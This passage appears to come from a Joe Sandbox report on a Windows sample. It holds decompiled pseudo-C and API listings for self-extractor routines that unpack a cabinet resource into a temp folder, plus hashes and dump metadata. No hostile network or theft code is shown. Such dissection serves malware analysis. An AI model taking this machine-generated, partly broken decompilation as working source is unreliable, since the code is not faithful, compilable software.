                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            					E00A444B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_t12 =  *0xa49140; // 0x0
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						FreeResource(_t12);
                                                                                                                                                                                                                                            						 *0xa49140 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						_t47 =  *0xa491d8; // 0x0
                                                                                                                                                                                                                                            						if(_t47 == 0) {
                                                                                                                                                                                                                                            							E00A444B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(( *0xa48a38 & 0x00000001) == 0 && ( *0xa49a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            						SendMessageA( *0xa48584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A44FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00A45006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00A4500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 00A45030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A45037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 00A4504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A45051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A45111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A45159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: e95cea3d6dfbc7bedf85ce9cb1817e736b51bf36ed696bf718cfb607c8651fdf
                                                                                                                                                                                                                                            • Instruction ID: a329714e4c8b016239917039efb7f0df3ce371d1643d3fe9bc3309e7faa135c4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e95cea3d6dfbc7bedf85ce9cb1817e736b51bf36ed696bf718cfb607c8651fdf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A313DBCB807017FE720DBF9BD89F67365CB7CA745F140624F901A21A2DBB68C128651
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 450 a42f1d-a42f3d 451 a42f6c-a42f73 call a45164 450->451 452 a42f3f-a42f46 450->452 461 a43041 451->461 462 a42f79-a42f80 call a455a0 451->462 454 a42f5f-a42f66 call a43a3f 452->454 455 a42f48 call a451e5 452->455 454->451 454->461 459 a42f4d-a42f4f 455->459 459->461 463 a42f55-a42f5d 459->463 465 a43043-a43053 call a46ce0 461->465 462->461 469 a42f86-a42fbe GetSystemDirectoryA call a4658a LoadLibraryA 462->469 463->451 463->454 472 a42ff7-a43004 FreeLibrary 469->472 473 a42fc0-a42fd4 GetProcAddress 469->473 474 a43006-a4300c 472->474 475 a43017-a43024 SetCurrentDirectoryA 472->475 473->472 476 a42fd6-a42fee DecryptFileA 473->476 474->475 477 a4300e call a4621e 474->477 478 a43054-a4305a 475->478 479 a43026-a4303c call a444b9 call a46285 475->479 476->472 485 a42ff0-a42ff5 476->485 489 a43013-a43015 477->489 481 a43065-a4306c 478->481 482 a4305c call a43b26 478->482 479->461 487 a4307c-a43089 481->487 488 a4306e-a43075 call a4256d 481->488 491 a43061-a43063 482->491 485->472 493 a430a1-a430a9 487->493 494 a4308b-a43091 487->494 498 a4307a 488->498 489->461 489->475 491->461 491->481 496 a430b4-a430b7 493->496 497 a430ab-a430ad 493->497 494->493 499 a43093 call a43ba2 494->499 496->465 497->496 501 a430af call a44169 497->501 498->487 504 a43098-a4309a 499->504 501->496 504->461 505 a4309c 504->505 505->493
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A42F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0xa48a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E00A45164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E00A46CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E00A455A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E00A4658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0xa4a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0xa48a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                                                            							if(_t21 != 0) {
                                                                                                                                                                                                                                            								__eflags =  *0xa48a2c - _t44; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									__eflags =  *0xa48d48 & 0x000000c0;
                                                                                                                                                                                                                                            									if(( *0xa48d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            										_t41 =  *0xa49a40; // 0x3, executed
                                                                                                                                                                                                                                            										_t26 = E00A4256D(_t41); // executed
                                                                                                                                                                                                                                            										_t44 = _t26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t22 =  *0xa48a24; // 0x0
                                                                                                                                                                                                                                            									 *0xa49a44 = _t44;
                                                                                                                                                                                                                                            									__eflags = _t22;
                                                                                                                                                                                                                                            									if(_t22 != 0) {
                                                                                                                                                                                                                                            										L26:
                                                                                                                                                                                                                                            										__eflags =  *0xa48a38;
                                                                                                                                                                                                                                            										if( *0xa48a38 == 0) {
                                                                                                                                                                                                                                            											__eflags = _t22;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												E00A44169(__eflags);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t12 = 1;
                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags =  *0xa49a30 - _t22; // 0x0
                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t25 = E00A43BA2(); // executed
                                                                                                                                                                                                                                            										__eflags = _t25;
                                                                                                                                                                                                                                            										if(_t25 == 0) {
                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t22 =  *0xa48a24; // 0x0
                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t27 = E00A43B26(_t40, _t44);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t43 = 0x4bc;
                                                                                                                                                                                                                                            							E00A444B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                            							 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t59 =  *0xa49a30 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A4621E(); // executed
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t49 =  *0xa48a24;
                                                                                                                                                                                                                                            				if( *0xa48a24 != 0) {
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					_t34 = E00A43A3F(_t51);
                                                                                                                                                                                                                                            					_t52 = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A451E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0xa48a38;
                                                                                                                                                                                                                                            				if( *0xa48a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00a43087
                                                                                                                                                                                                                                            0x00a43089
                                                                                                                                                                                                                                            0x00a430a1
                                                                                                                                                                                                                                            0x00a430a1
                                                                                                                                                                                                                                            0x00a430a9
                                                                                                                                                                                                                                            0x00a430ab
                                                                                                                                                                                                                                            0x00a430ad
                                                                                                                                                                                                                                            0x00a430af
                                                                                                                                                                                                                                            0x00a430af
                                                                                                                                                                                                                                            0x00a430ad
                                                                                                                                                                                                                                            0x00a430b6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4308b
                                                                                                                                                                                                                                            0x00a4308b
                                                                                                                                                                                                                                            0x00a43091
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43093
                                                                                                                                                                                                                                            0x00a43098
                                                                                                                                                                                                                                            0x00a4309a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4309c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4309c
                                                                                                                                                                                                                                            0x00a43089
                                                                                                                                                                                                                                            0x00a4305c
                                                                                                                                                                                                                                            0x00a43061
                                                                                                                                                                                                                                            0x00a43063
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43063
                                                                                                                                                                                                                                            0x00a4302b
                                                                                                                                                                                                                                            0x00a43032
                                                                                                                                                                                                                                            0x00a4303c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4303c
                                                                                                                                                                                                                                            0x00a43006
                                                                                                                                                                                                                                            0x00a4300c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4300e
                                                                                                                                                                                                                                            0x00a43015
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43015
                                                                                                                                                                                                                                            0x00a42f80
                                                                                                                                                                                                                                            0x00a42f3f
                                                                                                                                                                                                                                            0x00a42f46
                                                                                                                                                                                                                                            0x00a42f5f
                                                                                                                                                                                                                                            0x00a42f5f
                                                                                                                                                                                                                                            0x00a42f64
                                                                                                                                                                                                                                            0x00a42f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42f66
                                                                                                                                                                                                                                            0x00a42f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42f55
                                                                                                                                                                                                                                            0x00a42f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A42F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A42FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A42FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 00A42FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00A42FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A4301C
                                                                                                                                                                                                                                              • Part of subcall function 00A451E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A42F4D,?,00000002,00000000), ref: 00A45201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-58291647
                                                                                                                                                                                                                                            • Opcode ID: 75b99f046754c64bdcbbe05bb4befecc7bfcac266eb742d2e12816c2a54fa077
                                                                                                                                                                                                                                            • Instruction ID: 1ebaf93157e49c16aafbaa4a045952da91fb34928dfddad588fe0c53567e3652
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75b99f046754c64bdcbbe05bb4befecc7bfcac266eb742d2e12816c2a54fa077
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC41D83EA002159BDF30EBB5AD4576B33A8DBE6790F100275E901C2191EFB5CE86CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 522 a45467-a45484 523 a4551c-a45528 call a41680 522->523 524 a4548a-a45490 call a453a1 522->524 528 a4552d-a45539 call a458c8 523->528 527 a45495-a45497 524->527 529 a45581-a45583 527->529 530 a4549d-a454c0 call a41781 527->530 537 a4554d-a45552 528->537 538 a4553b-a45545 CreateDirectoryA 528->538 532 a4558d-a4559d call a46ce0 529->532 539 a454c2-a454d8 GetSystemInfo 530->539 540 a4550c-a4551a call a4658a 530->540 544 a45554-a45557 call a4597d 537->544 545 a45585-a4558b 537->545 542 a45577-a4557c call a46285 538->542 543 a45547 538->543 548 a454fe 539->548 549 a454da-a454dd 539->549 540->528 542->529 543->537 555 a4555c-a4555e 544->555 545->532 556 a45503-a45507 call a4658a 548->556 553 a454f7-a454fc 549->553 554 a454df-a454e2 549->554 553->556 557 a454e4-a454e7 554->557 558 a454f0-a454f5 554->558 555->545 559 a45560-a45566 555->559 556->540 557->540 561 a454e9-a454ee 557->561 558->556 559->529 562 a45568-a45575 RemoveDirectoryA 559->562 561->556 562->529
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A45467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
    struct _SYSTEM_INFO _v304;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t10;
    void* _t13;
    intOrPtr _t14;
    void* _t16;
    void* _t20;
    signed int _t26;
    void* _t28;
    void* _t29;
    CHAR* _t48;
    signed int _t49;
    intOrPtr _t61;

    _t10 =  *0xa48004; // 0x173b1603
    _v8 = _t10 ^ _t49;
    _push(__ecx);
    if(__edx == 0) {
        _t48 = 0xa491e4;
        _t42 = 0x104;
        E00A41680(0xa491e4, 0x104);
        L14:
        _t13 = E00A458C8(_t48); // executed
        if(_t13 != 0) {
            L17:
            _t42 = _a4;
            if(_a4 == 0) {
                L23:
                 *0xa49124 = 0;
                _t14 = 1;
                L24:
                return E00A46CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
            }
            _t16 = E00A4597D(_t48, _t42, 1, 0); // executed
            if(_t16 != 0) {
                goto L23;
            }
            _t61 =  *0xa48a20; // 0x0
            if(_t61 != 0) {
                 *0xa48a20 = 0;
                RemoveDirectoryA(_t48);
            }
            L22:
            _t14 = 0;
            goto L24;
        }
        if(CreateDirectoryA(_t48, 0) == 0) {
             *0xa49124 = E00A46285();
            goto L22;
        }
         *0xa48a20 = 1;
        goto L17;
    }
    _t42 =  &_v268;
    _t20 = E00A453A1(__ecx,  &_v268); // executed
    if(_t20 == 0) {
        goto L22;
    }
    _push(__ecx);
    _t48 = 0xa491e4;
    E00A41781(0xa491e4, 0x104, __ecx,  &_v268);
    if(( *0xa49a34 & 0x00000020) == 0) {
        L12:
        _t42 = 0x104;
        E00A4658A(_t48, 0x104, 0xa41140);
        goto L14;
    }
    GetSystemInfo( &_v304);
    _t26 = _v304.dwOemId & 0x0000ffff;
    if(_t26 == 0) {
        _push("i386");
        L11:
        E00A4658A(_t48, 0x104);
        goto L12;
    }
    _t28 = _t26 - 1;
    if(_t28 == 0) {
        _push("mips");
        goto L11;
    }
    _t29 = _t28 - 1;
    if(_t29 == 0) {
        _push("alpha");
        goto L11;
    }
    if(_t29 != 1) {
        goto L12;
    }
    _push("ppc");
    goto L11;
}
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45515
                                                                                                                                                                                                                                            0x00a454c9
                                                                                                                                                                                                                                            0x00a454d6
                                                                                                                                                                                                                                            0x00a454d8
                                                                                                                                                                                                                                            0x00a454fe
                                                                                                                                                                                                                                            0x00a45503
                                                                                                                                                                                                                                            0x00a45507
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45507
                                                                                                                                                                                                                                            0x00a454da
                                                                                                                                                                                                                                            0x00a454dd
                                                                                                                                                                                                                                            0x00a454f7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a454f7
                                                                                                                                                                                                                                            0x00a454df
                                                                                                                                                                                                                                            0x00a454e2
                                                                                                                                                                                                                                            0x00a454f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a454f0
                                                                                                                                                                                                                                            0x00a454e7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a454e9
                                                                                                                                                                                                                                            0x00000000

APIs
• GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A454C9
• CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4553D
• RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4556F
  • Part of subcall function 00A453A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A453FB
  • Part of subcall function 00A453A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45402
  • Part of subcall function 00A453A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4541F
  • Part of subcall function 00A453A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4542B
  • Part of subcall function 00A453A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45434
Strings
Memory Dump Source
• Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
Similarity
• API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
• API String ID: 1979080616-186922987
• Opcode ID: 5a147d5240c76f8bd5f771b87e8610db4686af84957e8b50902e0adc2b61ebc6
• Instruction ID: 6e7847f39e6ee8b8cad8d4a36ff768026f157428d17f347c5e6ba8016a7bfb96
• Opcode Fuzzy Hash: 5a147d5240c76f8bd5f771b87e8610db4686af84957e8b50902e0adc2b61ebc6
• Instruction Fuzzy Hash: 8E314D7DF00A046BCB14EFB9AD4457F77ABABC2740F14012AA402D6642DF71CE528693
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 86%
E00A42390(CHAR* __ecx) {
	signed int _v8;
	char _v276;
	char _v280;
	char _v284;
	struct _WIN32_FIND_DATAA _v596;
	struct _WIN32_FIND_DATAA _v604;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t21;
	int _t36;
	void* _t46;
	void* _t62;
	void* _t63;
	CHAR* _t65;
	void* _t66;
	signed int _t67;
	signed int _t69;

	_t69 = (_t67 & 0xfffffff8) - 0x254;
	_t21 =  *0xa48004; // 0x173b1603
	_t22 = _t21 ^ _t69;
	_v8 = _t21 ^ _t69;
	_t65 = __ecx;
	if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
		L10:
		_pop(_t62);
		_pop(_t66);
		_pop(_t46);
		return E00A46CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
	} else {
		E00A41680( &_v276, 0x104, __ecx);
		_t58 = 0x104;
		E00A416B3( &_v280, 0x104, "*");
		_t22 = FindFirstFileA( &_v284,  &_v604); // executed
		_t63 = _t22;
		if(_t63 == 0xffffffff) {
			goto L10;
		} else {
			goto L3;
		}
		do {
			L3:
			_t58 = 0x104;
			E00A41680( &_v276, 0x104, _t65);
			if((_v604.ftCreationTime & 0x00000010) == 0) {
				_t58 = 0x104;
				E00A416B3( &_v276, 0x104,  &(_v596.dwReserved1));
